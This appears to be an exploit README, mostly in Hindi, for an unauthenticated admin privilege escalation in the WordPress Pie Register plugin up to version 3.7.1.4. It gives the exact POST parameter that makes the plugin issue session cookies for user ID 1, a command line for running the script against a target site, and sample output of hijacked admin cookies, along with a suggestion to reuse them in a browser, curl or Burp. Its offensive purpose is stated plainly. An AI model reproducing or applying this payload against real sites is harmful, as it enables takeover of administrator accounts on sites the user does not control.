
WordPress Pie Register ≤ 3.7.1.4 - व्यवस्थापक विशेषाधिकार वृद्धि (बिना प्रमाणीकरण के)
Mrj Haxcore
WordPress के लिए Pie Register प्लगइन (संस्करण ≤ 3.7.1.4) एक अप्रमाणित एंडपॉइंट उजागर करता है जो हमलावर को केवल एक विशेष पेलोड POST करके एडमिन सत्रों को हाईजैक करने की अनुमति देता है।
इसका शोषण करने पर उपयोगकर्ता ID 1 के सत्र कुकीज़ चुराना संभव होता है (आमतौर पर admin), बिना किसी लॉगिन क्रेडेंशियल की आवश्यकता के।
pie-registeruser_id_social_site=1
जब इसे रूट URL (/) पर POST किया जाता है, तो यह पैरामीटर प्लगइन को हमलावर को ID 1 (आमतौर पर admin) वाले उपयोगकर्ता के रूप में प्रमाणित करने और मान्य सत्र कुकीज़ जारी करने का कारण बनता है।
requests, beautifulsoup4 (वैकल्पिक, कुकी पार्सिंग के लिए)python3 pie.py http://target.site
---
Output
[*] Sending payload to hijack admin session...
[+] Successfully hijacked cookies for user_id=1 (admin):
wordpress_sec_xxxxxx = <cookie_value>
wordpress_logged_in_xxxxxx = <cookie_value>
[!] Use these cookies in your browser or tools like curl or Burp to act as admin.